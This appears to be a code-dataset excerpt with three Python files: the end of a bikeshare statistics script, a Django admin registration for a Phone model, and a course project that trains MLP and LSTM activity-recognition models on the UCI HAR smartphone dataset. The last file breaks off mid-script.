Wednesday, Thursday, Friday, Saturday? ')\n if day.lower() in day_check:\n break\n print('Your entry is not a valid day of the week. Please reenter day of the week.')\n\n print('-'*40)\n return city, month, day\n\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n # load data file into a dataframe\n df = pd.read_csv(CITY_DATA[city.lower()])\n\n # convert the Start Time column to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n # extract month and day of week from Start Time to create new columns\n df['month'] = df['Start Time'].dt.month\n df['day_of_week'] = df['Start Time'].dt.weekday_name\n\n\n # filter by month if applicable\n if month.lower() != 'all':\n # use the index of the months list to get the corresponding int\n months = ['january', 'february', 'march', 'april', 'may', 'june']\n month = months.index(month.lower()) + 1\n\n # filter by month to create the new dataframe\n df = df[df['month'] == month]\n\n # filter by day of week if applicable\n if day.lower() != 'all':\n # filter by day of week to create the new dataframe\n df = df[df['day_of_week'] == day.title()]\n\n #Fill in or remove all NaN\n\n\n return df\n\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n\n # display the most common month\n pop_month = df['month'].mode()[0]\n print('The most common month was {}.'.format(cal.month_abbr[pop_month]))\n\n # display the most common day of week\n pop_day = df['day_of_week'].mode()[0]\n print('The most common day of the week was {}.'.format(pop_day))\n\n # display the most common start hour\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n df['hour'] = df['Start Time'].dt.hour\n pop_start_hour = 
df['hour'].mode()[0]\n if pop_start_hour > 12:\n pop_start_hour = str(pop_start_hour - 12) + ' pm'\n else:\n pop_start_hour = str(pop_start_hour) + ' am'\n print('The most common start hour was {}.'.format(pop_start_hour))\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n\n # display most commonly used start station\n pop_start_station = df['Start Station'].mode()[0]\n print('The most common starting station was {}.'.format(pop_start_station))\n\n # display most commonly used end station\n pop_end_station = df['End Station'].mode()[0]\n print('The most common end station was {}.'.format(pop_end_station))\n\n # display most frequent combination of start station and end station trip\n start_end_data = df.groupby(['Start Station', 'End Station']).size().sort_values(ascending=False)\n print('The most common trip was {}.'.format(start_end_data.index[0][0] + \" to \" + start_end_data.index[0][1]))\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # display total travel time\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n df['End Time'] = pd.to_datetime(df['End Time'])\n\n df['time_diff'] = df['End Time'] - df['Start Time']\n\n days = df['time_diff'].sum().days\n hours, remainder = divmod(df['time_diff'].sum().seconds, 3600)\n minutes, seconds = divmod(remainder, 60)\n\n print('Total time traveling was {} days, {} hrs, {} mins, and {} seconds.'.format(days, hours, minutes, seconds))\n\n # display mean travel time\n hours, remainder = divmod(df['time_diff'].mean().seconds, 3600)\n minutes, seconds = divmod(remainder, 60)\n print('Average trip duration was {} hrs, {} mins, and {} seconds.'.format(hours, minutes, seconds))\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef user_stats(df, city):\n \"\"\"Displays statistics on bikeshare users, excluding Washington from gender and birth year stats.\"\"\"\n\n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n # Display counts of user types\n users_type = df['User Type'].value_counts()\n print('The counts of the user types are: \\n')\n print(dict(users_type))\n print('\\n')\n # Display counts of gender\n if city.lower() != 'washington':\n users_gen = df['Gender'].value_counts()\n print('The counts of the user\\'s gender are: \\n')\n print(dict(users_gen))\n\n # Display earliest, most recent, and most common year of birth\n print('\\nThe earliest birth year was {}. \\nThe most recent birth year was {}. \\nThe most common birth year is {}.'.format(int(df['Birth Year'].min()), int(df['Birth Year'].max()), int(df['Birth Year'].value_counts().index[0])))\n else:\n print('Washington does not collect data on gender and birth year.')\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\ndef view_raw_data(df):\n \"\"\"Displays 5 lines of raw data based on users request. Prompts user to display 5 more or stop viewing raw data.\"\"\"\n while True:\n view_data = input('\\nWould you like to view the raw data? Data will be displayed 5 lines at a time. 
Enter yes or no.\\n')\n        if view_data.lower() == 'no':\n            break\n        n = 0\n        more_data = 'yes'\n        while more_data.lower() == 'yes':\n            print(df[n:n+5])\n            n += 5\n            more_data = input('\\nWould you like to see 5 more lines? Yes or No? \\n')\n            if more_data.lower() not in ('yes', 'no'):\n                # re-prompt once on a bad entry instead of silently exiting\n                more_data = input('\\nIncorrect entry. Would you like to see 5 more lines? Yes or No?\\n')\n\ndef main():\n    while True:\n        city, month, day = get_filters()\n        df = load_data(city, month, day)\n\n        time_stats(df)\n        station_stats(df)\n        trip_duration_stats(df)\n        user_stats(df, city)\n\n        view_raw_data(df)\n\n        restart = input('\\nWould you like to restart? Enter yes or no.\\n')\n        if restart.lower() != 'yes':\n            break\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"bikeshare_reichwald.py","file_name":"bikeshare_reichwald.py","file_ext":"py","file_size_in_byte":8698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"482178262","text":"from django.contrib import admin\nfrom .models import Phone\n\n\nclass PhoneAdmin(admin.ModelAdmin):\n    list_display = ['id', 'name', 'price', 'image', 'release_date', 'lte_exists', 'slug']\n    list_filter = ['name', 'price']\n    prepopulated_fields = {'slug': ('name',)}\n\n\nadmin.site.register(Phone, PhoneAdmin)\n# Register your models here.
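\n\n# --- Note (added for clarity) ---\n# The admin options above assume the Phone model defines name, price, image,\n# release_date, lte_exists and slug fields; prepopulated_fields makes the\n# admin add form pre-fill slug from name as you type.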
\n","sub_path":"phones/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"140857098","text":"\"\"\"\nCS 535 Deep Learning Final Project\nAuthors: Zhou Fang, Jiale Liu\nFinal Update: 03/20/2018\nDescription: This project is based on the UCI HAR dataset \"Human Activity\nRecognition Using Smartphones\" and runs on the GPU with PyTorch. MLP and LSTM\nmodels are trained and their performance is compared. Improvements are made in\nfeature selection: feature importance from RandomForestClassifier, mutual\ninformation feature selection (MIFS), and F-score.\n\"\"\"\nfrom __future__ import print_function\nfrom __future__ import division\nimport matplotlib as mpl\nmpl.use('Agg')\nfrom matplotlib import pyplot as plt\nfrom collections import defaultdict\nimport pandas as pd\nimport numpy as np\nfrom sklearn.utils import shuffle\nfrom sklearn import preprocessing\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch.optim as optim\nfrom sklearn.metrics import confusion_matrix\nimport itertools\nfrom sklearn.feature_selection import SelectKBest\nfrom sklearn.feature_selection import f_classif\nfrom sklearn.ensemble import RandomForestClassifier\n\nclass MLPNet(nn.Module):\n    \"\"\"\n    MLPNet defines the MLP baseline model.\n    \"\"\"\n    def __init__(self, num_feature, hidden_dim, batch_size):\n        super(MLPNet, self).__init__()\n        self.hidden_dim = hidden_dim\n        self.batch_size = batch_size\n        self.fc1 = nn.Linear(num_feature, hidden_dim)\n        self.fc2 = nn.Linear(hidden_dim, 6)\n        self.hidden = self.init_hidden()\n    def init_hidden(self):\n        # the MLP keeps no recurrent state; returning a dummy value keeps the\n        # interface identical to LSTMNet so one training loop serves both\n        return 512\n    def forward(self, x):\n        x = F.relu(self.fc1(x))\n        x = self.fc2(x)\n        return x\n\nclass LSTMNet(nn.Module):\n    \"\"\"\n    LSTMNet defines the LSTM model.\n    \"\"\"\n    def __init__(self, num_feature, hidden_dim, batch_size):\n        super(LSTMNet, self).__init__()\n        self.hidden_dim = hidden_dim\n        self.batch_size = batch_size\n        self.num_feature = num_feature\n        self.lstm = nn.LSTM(num_feature, hidden_dim, dropout = 0.5)\n        self.fc = nn.Linear(hidden_dim, 6)\n        self.hidden = self.init_hidden()\n    def init_hidden(self):\n        h0 = Variable(torch.zeros(1, self.batch_size, self.hidden_dim).cuda())\n        c0 = Variable(torch.zeros(1, self.batch_size, self.hidden_dim).cuda())\n        return (h0, c0)\n    def forward(self, x):\n        x = x.view(-1, self.batch_size, self.num_feature)\n        x, self.hidden = self.lstm(x, self.hidden)\n        x = self.fc(x[-1])\n        return x\n\ndef eval_net(data_x_loader, data_y_loader, total_dict, net):\n    \"\"\"\n    Evaluate the model on one (inputs, labels) loader pair; returns average\n    loss, overall accuracy, per-activity accuracy, the predictions, and the\n    model itself.\n    \"\"\"\n    correct = 0\n    correct_dict = defaultdict(int)\n    acc_dict = defaultdict(int)\n    prediction = []\n    total = 0\n    total_loss = 0\n    net.eval()\n    criterion = nn.CrossEntropyLoss(size_average=False)\n    for i, (params, labels) in enumerate(zip(data_x_loader, data_y_loader)):\n        params, labels = (Variable(params).float()).cuda(), Variable(labels).cuda()\n        net.batch_size = len(labels)\n        net.hidden = net.init_hidden()\n        outputs = net(params)\n        _, predicted = torch.max(outputs.data, 1)\n        total += labels.size(0)\n        for i, predict in enumerate(predicted):\n            prediction.append(predict)\n            if predict == labels.data[i]:\n                correct_dict[predict] += 1\n                correct += 1\n        loss = criterion(outputs, labels)\n        total_loss += loss.data[0]\n    for key, item in correct_dict.items():\n        acc_dict[key] = item/total_dict[key]\n    net.train()\n    return total_loss / total, correct / total, acc_dict, prediction, net\n\ndef WriteResult(file, epoch, train_loss, train_acc, test_loss, test_acc):\n    \"\"\"\n    Write train/test loss and accuracy for one epoch to the result file.\n    \"\"\"\n    file.write('EPOCH: %d train_loss: %.5f train_acc: %.5f test_loss: %.5f test_acc %.5f\\n' %\n               (epoch+1, train_loss, train_acc, test_loss, test_acc))\n\ndef WriteDictResult(file, epoch, classes, acc_dict):\n    
\"\"\"\n in WriteDictResult function, write test loss in 6 activities in each epoch\n \"\"\"\n file.write('EPOCH: %d' %(epoch+1))\n for i, item in enumerate(classes):\n file.write(' %s: %.5f' %(item, acc_dict[i]))\n file.write('\\n')\n\ndef drawPlotLoss(num_epochs, loss_out, parameter, resultlist, parameter2):\n \"\"\"\n in drawPlotLoss function, we plot the train and test loss with model and save it.\n \"\"\"\n plt.figure()\n plt.plot(range(1,num_epochs + 1), loss_out[0], '-bo', label = \"%s %s\" %(resultlist[0], parameter))\n plt.plot(range(1,num_epochs + 1), loss_out[1], '-yv', label = \"%s %s\" %(resultlist[1], parameter))\n plt.plot(range(1,num_epochs + 1), loss_out[2], '-cd', label = \"%s %s\" %(resultlist[2], parameter))\n plt.plot(range(1,num_epochs + 1), loss_out[3], '-rs', label = \"%s %s\" %(resultlist[3], parameter))\n plt.xlim(1, num_epochs)\n plt.ylim(0, 1.5)\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"%s\" %(parameter))\n plt.grid(True)\n plt.legend(loc = 'upper right')\n plt.title(\"%s of %s and %s\" %(parameter, parameter2[0], parameter2[1]))\n plt.savefig((\"%s of %s and %s.png\" %(parameter, parameter2[0], parameter2[1])))\n\ndef drawPlotAcc(num_epochs, acc_out, parameter, resultlist, parameter2):\n \"\"\"\n in drawPlotAcc function, we plot the train and test accuracy with different model and save it.\n \"\"\"\n plt.figure()\n plt.plot(range(1,num_epochs + 1), acc_out[0], '-bo', label = \"%s %s\" %(resultlist[0], parameter))\n plt.plot(range(1,num_epochs + 1), acc_out[1], '-yv', label = \"%s %s\" %(resultlist[1], parameter))\n plt.plot(range(1,num_epochs + 1), acc_out[2], '-cd', label = \"%s %s\" %(resultlist[2], parameter))\n plt.plot(range(1,num_epochs + 1), acc_out[3], '-rs', label = \"%s %s\" %(resultlist[3], parameter))\n plt.xlim(1, num_epochs)\n plt.ylim(0.5, 1.0)\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"%s\" %(parameter))\n plt.grid(True)\n plt.legend(loc = 'lower right')\n plt.title(\"%s of %s and %s\" %(parameter, parameter2[0], parameter2[1]))\n plt.savefig((\"%s of %s and %s.png\" %(parameter, parameter2[0], parameter2[1])))\n\ndef drawPlotDict(num_epochs, acc_out, classes, model):\n \"\"\"\n in drawPlotDict function, we plot the test accuracy with 6 activities and save it.\n \"\"\"\n color_list = ['-go', '-rs', '-bp', '-cd', '-k*', '-yv']\n plt.figure()\n for i, parameter in enumerate(classes):\n plt.plot(range(1,num_epochs + 1), acc_out[i], color_list[i], label = \"%s Accuracy\" %(str(parameter)))\n plt.xlim(0, num_epochs)\n plt.ylim(0.5, 1.01)\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Test accuracy\")\n plt.grid(True)\n plt.legend(loc = 'lower right')\n plt.title(\"%s Test Accuracy With Different Activity\" %(str(model)))\n plt.savefig(\"%s_test_accuracy_with_different_dctivity.png\" %(str(model)))\n\ndef drawPlotBar(classes, list1, list2, parameter):\n \"\"\"\n in drawPlotBar function, we plot 6 activities acc at best accuracy achieved epoch with different models.\n \"\"\"\n plt.figure(figsize=(9, 7))\n x = list(range(6))\n width = 0.35\n plot1 = plt.bar(x, list1, width = width, color = '#0072BC', label = parameter[0])\n for i in range(6):\n x[i] = x[i] + width\n plot2 = plt.bar(x, list2, width = width, color = '#ED1C24', label = parameter[1])\n plt.xticks(x, classes, rotation = 10)\n plt.ylim(0,105)\n plt.ylabel(\"Accuracy(percentage)\")\n plt.legend(loc = 'lower right')\n def add_labels(valuelist):\n for value in valuelist:\n height = value.get_height()\n plt.text(value.get_x() + value.get_width() / 2, height, height, ha='center', va='bottom')\n 
value.set_edgecolor('white')\n add_labels(plot1)\n add_labels(plot2)\n plt.title(\"Comparison Between %s And %s With Different Activity\" %(parameter[0], parameter[1]))\n plt.savefig(\"comparison_between_%s_and_%s_with_different_activity.png\" %(parameter[0], parameter[1]))\n\ndef figurePlot(MAX_EPOCH, classes, train_loss_MLP, test_loss_MLP, train_loss_LSTM,\n test_loss_LSTM, train_acc_MLP, test_acc_MLP,train_acc_LSTM,test_acc_LSTM,\n laying_acc_MLP, sitting_acc_MLP, standing_acc_MLP, walking_acc_MLP,\n walkingdown_acc_MLP, walkingup_acc_MLP, laying_acc_LSTM, sitting_acc_LSTM,\n standing_acc_LSTM, walking_acc_LSTM, walkingdown_acc_LSTM, walkingup_acc_LSTM, file,\n parameter1, parameter2, parameter3):\n \"\"\"\n in figurePlot function, we plot the train and test accuracy with different model, \n the train and test loss with different model, the test accuracy in 6 activities with different model\n \"\"\"\n y1 = []\n y1.append(train_loss_MLP)\n y1.append(test_loss_MLP)\n y1.append(train_loss_LSTM)\n y1.append(test_loss_LSTM)\n drawPlotLoss(MAX_EPOCH, y1, parameter1[0], parameter2, parameter3)\n y2 = []\n y2.append(train_acc_MLP)\n y2.append(test_acc_MLP)\n y2.append(train_acc_LSTM)\n y2.append(test_acc_LSTM)\n drawPlotAcc(MAX_EPOCH, y2, parameter1[1], parameter2, parameter3)\n y3 = []\n y3.append(laying_acc_MLP)\n y3.append(sitting_acc_MLP)\n y3.append(standing_acc_MLP)\n y3.append(walking_acc_MLP)\n y3.append(walkingdown_acc_MLP)\n y3.append(walkingup_acc_MLP)\n drawPlotDict(MAX_EPOCH, y3, classes, parameter3[0])\n y4 = []\n y4.append(laying_acc_LSTM)\n y4.append(sitting_acc_LSTM)\n y4.append(standing_acc_LSTM)\n y4.append(walking_acc_LSTM)\n y4.append(walkingdown_acc_LSTM)\n y4.append(walkingup_acc_LSTM)\n drawPlotDict(MAX_EPOCH, y4, classes, parameter3[1])\n list1 = []\n max_index1 = test_acc_MLP.index(max(test_acc_MLP))\n file.write(\"%d\\n\" %(max_index1 + 1))\n list1.append(float('%.2f'%(laying_acc_MLP[max_index1]*100)))\n list1.append(float('%.2f'%(sitting_acc_MLP[max_index1]*100)))\n list1.append(float('%.2f'%(standing_acc_MLP[max_index1]*100)))\n list1.append(float('%.2f'%(walking_acc_MLP[max_index1]*100)))\n list1.append(float('%.2f'%(walkingdown_acc_MLP[max_index1]*100)))\n list1.append(float('%.2f'%(walkingup_acc_MLP[max_index1]*100)))\n list2 = []\n max_index2 = test_acc_LSTM.index(max(test_acc_LSTM))\n file.write(\"%d\\n\" %(max_index2 + 1))\n list2.append(float('%.2f'%(laying_acc_LSTM[max_index2]*100)))\n list2.append(float('%.2f'%(sitting_acc_LSTM[max_index2]*100)))\n list2.append(float('%.2f'%(standing_acc_LSTM[max_index2]*100)))\n list2.append(float('%.2f'%(walking_acc_LSTM[max_index2]*100)))\n list2.append(float('%.2f'%(walkingdown_acc_LSTM[max_index2]*100)))\n list2.append(float('%.2f'%(walkingup_acc_LSTM[max_index2]*100)))\n drawPlotBar(classes, list1, list2, parameter3)\n\ndef LoadData(train, test, FC_fscore, FC_mifs):\n \"\"\"\n in LoadData function, we load train and test data and put them into dataloader.\n return 6 activities, count for 6 activities, train_x, test_x, train_y and test_y dataloader, also\n get dataloader for feature selection.\n \"\"\"\n train_data = pd.read_csv(train)\n test_data = pd.read_csv(test)\n train_data = shuffle(train_data)\n test_data = shuffle(test_data)\n train_label = train_data['Activity']\n test_label = test_data['Activity']\n train_x = np.asarray(train_data.drop(['subject', 'Activity'], axis=1))\n test_x = np.asarray(test_data.drop(['subject', 'Activity'], axis=1))\n\n # 561 features dataloader\n train_x_loader = 
torch.utils.data.DataLoader(train_x, batch_size=BATCH_SIZE,\n                                                shuffle=False, num_workers=4)\n    test_x_loader = torch.utils.data.DataLoader(test_x, batch_size=BATCH_SIZE,\n                                                shuffle=False, num_workers=4)\n\n    # encode the activity labels as integers\n    encoder = preprocessing.LabelEncoder()\n    encoder.fit(train_label)\n    classes = list(encoder.classes_)\n    train_y = np.asarray(encoder.transform(train_label))\n    test_y = np.asarray(encoder.transform(test_label))\n\n    # get the 561 feature names\n    x_columns = [x for x in train_data.columns if x not in ['subject', 'Activity']]\n\n    # choose features by F-score\n    file = open(FC_fscore, 'r')\n    selected_index = file.read().split(' ')\n    selected_index = [int(i) for i in selected_index[: -1]]  # a list, not a lazy map, so len() works\n    print(\"numbers of selected feature for F-score: %d\" %(len(selected_index)))\n    file.close()\n    selected_feature = []\n    for i in selected_index:\n        selected_feature.append(x_columns[i])\n    train_x = np.asarray(pd.DataFrame(train_data, columns=selected_feature))\n    test_x = np.asarray(pd.DataFrame(test_data, columns=selected_feature))\n    train_x_loader_fscore = torch.utils.data.DataLoader(train_x, batch_size=BATCH_SIZE,\n                                                        shuffle=False, num_workers=4)\n    test_x_loader_fscore = torch.utils.data.DataLoader(test_x, batch_size=BATCH_SIZE,\n                                                       shuffle=False, num_workers=4)\n\n    # choose features by MIFS\n    file = open(FC_mifs, 'r')\n    selected_index = file.read().split(' ')\n    selected_index = [int(i) for i in selected_index[: -1]]\n    print(\"numbers of selected feature for MIFS: %d\" %(len(selected_index)))\n    file.close()\n    selected_feature = []\n    for i in selected_index:\n        selected_feature.append(x_columns[i])\n    train_x = np.asarray(pd.DataFrame(train_data, columns=selected_feature))\n    test_x = np.asarray(pd.DataFrame(test_data, columns=selected_feature))\n    train_x_loader_mifs = torch.utils.data.DataLoader(train_x, batch_size=BATCH_SIZE,\n                                                      shuffle=False, num_workers=4)\n    test_x_loader_mifs = torch.utils.data.DataLoader(test_x, batch_size=BATCH_SIZE,\n                                                     shuffle=False, num_workers=4)\n\n    # choose features by RandomForestClassifier importance; the forest must be\n    # fit on the full 561-feature matrix (train_x was overwritten by the MIFS\n    # selection above) so that the importances line up with x_columns\n    rf0 = RandomForestClassifier()\n    train_x_full = np.asarray(train_data.drop(['subject', 'Activity'], axis=1))\n    rf0.fit(train_x_full, train_y)\n    importances = rf0.feature_importances_\n\n    for feature, score in zip(x_columns, importances):\n        if score <= 0.0001:\n            train_data = train_data.drop(feature, axis = 1)\n            test_data = test_data.drop(feature, axis = 1)\n    train_data = train_data.drop(['subject', 'Activity'], axis=1)\n    test_data = test_data.drop(['subject', 'Activity'], axis=1)\n    import_feature = len(train_data.columns)\n    file1 = open(\"train and test data information.txt\", \"w\")\n    file1.write('Selected feature numbers(randomforestclassifier): %d\\n\\n' %(import_feature))\n    file1.write('Selected feature columns(randomforestclassifier):')\n    for name_feature in train_data.columns:\n        file1.write('%s ' %(name_feature))\n    file1.write(\"\\n\\n\")\n    train_x1 = np.asarray(train_data)\n    test_x1 = np.asarray(test_data)\n    train_import_x_loader = torch.utils.data.DataLoader(train_x1, batch_size=BATCH_SIZE,\n                                                        shuffle=False, num_workers=4)\n    test_import_x_loader = torch.utils.data.DataLoader(test_x1, batch_size=BATCH_SIZE,\n                                                       shuffle=False, num_workers=4)\n\n    # count the 6 classes in the train and test sets and log the counts\n    train_total_dict = defaultdict(int)\n    test_total_dict = defaultdict(int)\n    for i in train_y:\n        train_total_dict[i] += 1\n    for i in test_y:\n        test_total_dict[i] += 1\n    file1.write('Numbers of 6 Activities in Train:\\n')\n    for key, item in train_total_dict.items():\n        file1.write('%s: %d\\n' %(classes[key], item))\n    file1.write('Numbers of 6 Activities in 
Test:\\n')\n for key, item in test_total_dict.items():\n file1.write('%s: %d\\n' %(classes[key], item))\n file1.close()\n\n # build label dataloader\n train_y_loader = torch.utils.data.DataLoader(train_y, batch_size=BATCH_SIZE,\n shuffle=False, num_workers=4)\n test_y_loader = torch.utils.data.DataLoader(test_y, batch_size=BATCH_SIZE,\n shuffle=False, num_workers=4)\n return classes, train_total_dict, test_total_dict, import_feature, train_x_loader,\\\n train_y_loader, test_x_loader, test_y_loader, train_x_loader_fscore, test_x_loader_fscore,\\\n train_x_loader_mifs, test_x_loader_mifs, train_import_x_loader, test_import_x_loader, train_y, test_y\n\ndef Classifier(net, file1, file2, optimizer, BATCH_SIZE, MAX_EPOCH, classes, train_total_dict, \n test_total_dict, train_x_loader, train_y_loader, test_x_loader, test_y_loader):\n \"\"\"\n in Classifier function, we train the model and predict test label. return loss results,\n prediction results and 6 activities prediction result.\n \"\"\"\n train_loss_model = []\n train_acc_model = []\n test_loss_model = []\n test_acc_model = []\n laying_acc = []\n sitting_acc = []\n standing_acc = []\n walking_acc = []\n walkingdown_acc = []\n walkingup_acc = []\n criterion = nn.CrossEntropyLoss()\n test_acc_pre = 0\n for epoch in range(MAX_EPOCH):\n running_loss = 0.0\n for i, (inputs, labels) in enumerate(zip(train_x_loader, train_y_loader)):\n inputs, labels = (Variable(inputs).float()).cuda(), Variable(labels).cuda()\n optimizer.zero_grad()\n net.batch_size = len(labels)\n net.hidden = net.init_hidden()\n outputs = net(inputs)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n print('Finish training EPOCH %d, start evaluating...' %(epoch+1))\n train_loss, train_acc, train_acc_dict, train_prediction, net = eval_net(train_x_loader, train_y_loader, train_total_dict, net)\n test_loss, test_acc, test_acc_dict, test_prediction, net = eval_net(test_x_loader, test_y_loader, test_total_dict, net)\n train_loss_model.append(train_loss)\n train_acc_model.append(train_acc)\n test_loss_model.append(test_loss)\n test_acc_model.append(test_acc)\n laying_acc.append(test_acc_dict[0])\n sitting_acc.append(test_acc_dict[1])\n standing_acc.append(test_acc_dict[2])\n walking_acc.append(test_acc_dict[3])\n walkingdown_acc.append(test_acc_dict[4])\n walkingup_acc.append(test_acc_dict[5])\n # we only output the best prediction\n if test_acc_pre < test_acc:\n best_prediction = test_prediction\n test_acc_pre = test_acc\n # print('EPOCH: %d train_loss: %.5f train_acc: %.5f test_loss: %.5f test_acc %.5f' %\n # (epoch+1, train_loss, train_acc, test_loss, test_acc))\n WriteDictResult(file2, epoch, classes, test_acc_dict)\n WriteResult(file1, epoch, train_loss, train_acc, test_loss, test_acc)\n return train_loss_model, train_acc_model, test_loss_model, test_acc_model,laying_acc,\\\n sitting_acc, standing_acc, walking_acc, walkingdown_acc, walkingup_acc, best_prediction\n\ndef PlotConfusionMatrix(cm, classes, normalize=False, title='Confusion matrix', cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n plt.figure(figsize=(11.2, 8))\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=10)\n plt.yticks(tick_marks, classes)\n\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n 
print('Confusion matrix, without normalization')\n\n print(cm)\n\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, cm[i, j],\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n plt.savefig(\"%s.png\" %(str(title)))\n\nif __name__ == \"__main__\":\n\n # Pparameter define\n BATCH_SIZE = 32 # mini_batch size, can be changed\n MAX_EPOCH = 50 # maximum epoch to train, can be changed\n NUM_FEATURE = 561 # input feature numbers, cannot be changed\n\n # data loaders. classes is 6 activities.\n # train_total_dict and test_total_dict is count for 6 activities.\n train = \"train.csv\"\n test = \"test.csv\"\n FC_fscore = \"selected feature f_score.txt\" \n FC_mifs = \"selected feature MIFS.txt\" \n print(\"Data loading and processing...\")\n classes, train_total_dict, test_total_dict, import_feature,\\\n train_x_loader, train_y_loader, test_x_loader, test_y_loader, train_x_loader_fscore, test_x_loader_fscore,\\\n train_x_loader_mifs, test_x_loader_mifs, train_import_x_loader,\\\n test_import_x_loader, train_y, test_y = LoadData(train, test, FC_fscore, FC_mifs)\n print(\"Finished data loading and processing...\")\n \n # MLP Classifier, train 50 epoches, return train loss, test loss, train acc, test acc,\n # and test acc for different activity. Best test acc around 95%\n net = MLPNet(num_feature=NUM_FEATURE, hidden_dim=512, batch_size=BATCH_SIZE)\n net = net.cuda()\n net.train()\n file1 = open(\"MLP Classifier Result.txt\", \"w\")\n file2 = open(\"MLP Classifier Dict Result.txt\", \"w\")\n file1.write('Number of select feature: %d\\n' %(NUM_FEATURE))\n file2.write('Number of select feature: %d\\n' %(NUM_FEATURE))\n optimizer = optim.SGD(net.parameters(), lr=0.0009, momentum=0.9)\n #optimizer = optim.Adam(net.parameters(), lr=0.00043, betas=(0.9, 0.999), eps=1e-1)\n print('Start MLP training...')\n train_loss_MLP, train_acc_MLP, test_loss_MLP, test_acc_MLP,\\\n laying_acc_MLP, sitting_acc_MLP, standing_acc_MLP, walking_acc_MLP, walkingdown_acc_MLP,\\\n walkingup_acc_MLP, test_prediction_MLP = Classifier(net, file1, file2, optimizer, BATCH_SIZE, MAX_EPOCH, classes, train_total_dict, \n test_total_dict, train_x_loader, train_y_loader, test_x_loader, test_y_loader)\n file1.close()\n file2.close()\n print('Finished MLP Training...')\n\n # LSTM Classifier, train 50 epoches, return train loss, test loss, train acc, test acc,\n # and test acc for different activity. 
Best test acc around 95%\n net = LSTMNet(num_feature=NUM_FEATURE, hidden_dim=512, batch_size=BATCH_SIZE)\n net = net.cuda()\n net.train()\n file1 = open(\"LSTM Classifier Result.txt\", \"w\")\n file2 = open(\"LSTM Classifier Dict Result.txt\", \"w\")\n file1.write('Number of select feature: %d\\n' %(NUM_FEATURE))\n file2.write('Number of select feature: %d\\n' %(NUM_FEATURE))\n optimizer = optim.SGD(net.parameters(), lr=0.0016, momentum=0.9)\n #optimizer = optim.Adam(net.parameters(), lr=0.00063, betas=(0.9, 0.999), eps=1e-2)\n print('Start LSTM training...')\n train_loss_LSTM, train_acc_LSTM, test_loss_LSTM, test_acc_LSTM,laying_acc_LSTM,\\\n sitting_acc_LSTM, standing_acc_LSTM,walking_acc_LSTM,walkingdown_acc_LSTM,\\\n walkingup_acc_LSTM, test_prediction_LSTM = Classifier(net, file1, file2, optimizer, BATCH_SIZE, MAX_EPOCH, classes, train_total_dict, \n test_total_dict, train_x_loader, train_y_loader, test_x_loader, test_y_loader)\n file1.close()\n file2.close()\n print('Finished LSTM Training...')\n\n\n NUM_FEATURE = import_feature\n # Importance MLP Classifier, train 50 epoches, return train loss, test loss, train acc, test acc,\n # and test acc for different activity. Best test acc around 94% - 95.5%\n net = MLPNet(num_feature=NUM_FEATURE, hidden_dim=512, batch_size=BATCH_SIZE)\n net = net.cuda()\n net.train()\n file1 = open(\"MLP Classifier Result(fc).txt\", \"w\")\n file2 = open(\"MLP Classifier Dict Result(fc).txt\", \"w\")\n file1.write('Number of select feature: %d\\n' %(NUM_FEATURE))\n file2.write('Number of select feature: %d\\n' %(NUM_FEATURE))\n optimizer = optim.SGD(net.parameters(), lr=0.0013, momentum=0.9)\n #optimizer = optim.Adam(net.parameters(), lr=0.0008, betas=(0.9, 0.999))\n print('Start Importance Feature Selection MLP training...')\n train_loss_MLP_fc, train_acc_MLP_fc, test_loss_MLP_fc, test_acc_MLP_fc,\\\n laying_acc_MLP_fc, sitting_acc_MLP_fc, standing_acc_MLP_fc, walking_acc_MLP_fc, walkingdown_acc_MLP_fc,\\\n walkingup_acc_MLP_fc, test_prediction_MLP_fc = Classifier(net, file1, file2, optimizer, BATCH_SIZE, MAX_EPOCH, classes, train_total_dict, \n test_total_dict, train_import_x_loader, train_y_loader, test_import_x_loader, test_y_loader)\n file1.close()\n 